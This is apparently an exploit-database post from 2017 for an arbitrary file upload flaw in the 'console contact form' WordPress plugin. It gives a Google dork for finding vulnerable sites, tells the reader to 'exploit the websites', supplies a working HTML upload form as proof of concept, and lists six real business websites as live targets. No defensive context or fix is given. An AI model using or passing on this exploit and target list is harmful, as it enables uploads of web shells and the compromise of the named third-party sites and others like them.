# Exploit Title: WordPress Plugins console contact form - Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/console_contact_form/
# Date:2017-06-06
# Exploit Author: sohaip-hackerDZ
# Tested on:linux mint
# 1. search dork for google
# 2. Exploit the websites
# https://localhost//wp-content/plugins/console_contact_form/upload_file.php?files
# [+] if MSG :
# {"files":[]}
# 4. PoC :
===================================================================================================
<form method="POST" action="hhtp://127.0.0.1/wp-content/plugins/console_contact_form/upload_file.php?files" enctype="multipart/form-data">
<input type="file" name="files[]" />
<button>Upload!</button><br/>
</form>
====================================================================================================
[+] dimo :
================================================================
https://www.fxwebstudio.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
https://www.tuza.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
http://www.physioandbeyond.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
http://www.theplumbingeffect.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
hhtp://www.cld9.ph/wp-content/plugins/console_contact_form/upload_file.php?files
http://https://www.hellolocalmedia.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
=========================================================================================
Great : sohaip-hackerDZ :: spyhackerz.com #
fp : https://www.facebook.com/sohaipbarika #
forum : http://www.spyhackerz.com/forum/ #
############################################